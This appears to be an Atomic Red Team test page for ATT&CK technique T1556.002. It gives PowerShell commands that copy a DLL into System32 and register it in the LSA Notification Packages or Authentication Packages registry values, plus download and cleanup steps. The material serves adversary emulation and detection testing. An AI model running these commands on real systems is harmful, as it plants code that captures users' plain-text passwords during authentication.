T1556.002 - Modify Authentication Process: Password Filter DLL

Description from ATT&CK

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)

Atomic Tests


Atomic Test #1 - Install and Register Password Filter DLL

Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection Source is in src folder. This does require a reboot to see the filter loaded into lsass.exe. It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.

Supported Platforms: Windows

auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | dll_path | Path to DLL to be installed and registered | path | PathToAtomicsFolder\T1556.002\bin| | dll_name | Name of the Password Filter | string | AtomicRedTeamPWFilter.dll|

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues

Cleanup Commands:

1
2
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}

Dependencies: Run with
1
powershell
!

Description: AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}#{dll_name})
Check Prereq Commands:
1
if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"



Atomic Test #2 - Install Additional Authentication Packages

lsass.exe loads all DLLs specified by the Authentication Packages REG_MULTI_SZ value. Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. The binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection Source is in src folder. This does require a reboot to see the filter loaded into lsass.exe. It does require Administrative privileges to import the clean registry values back into LSA, it is possible you may have to manually do this after for cleanup.

Supported Platforms: Windows

auto_generated_guid: 91580da6-bc6e-431b-8b88-ac77180005f2

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | dll_path | Path to DLL to be installed and registered as additional authentication package | path | PathToAtomicsFolder\T1556.002\bin| | dll_name | Name of the Password Filter | string | AtomicRedTeamPWFilter.dll|

Attack Commands: Run with
1
powershell
! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$AuthenticationPackagesValues = $lsaKey.GetValue("Authentication Packages")
$AuthenticationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Authentication Packages" $AuthenticationPackagesValues

Cleanup Commands:

1
2
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}

Dependencies: Run with
1
powershell
!

Description: AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}#{dll_name})
Check Prereq Commands:
1
if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"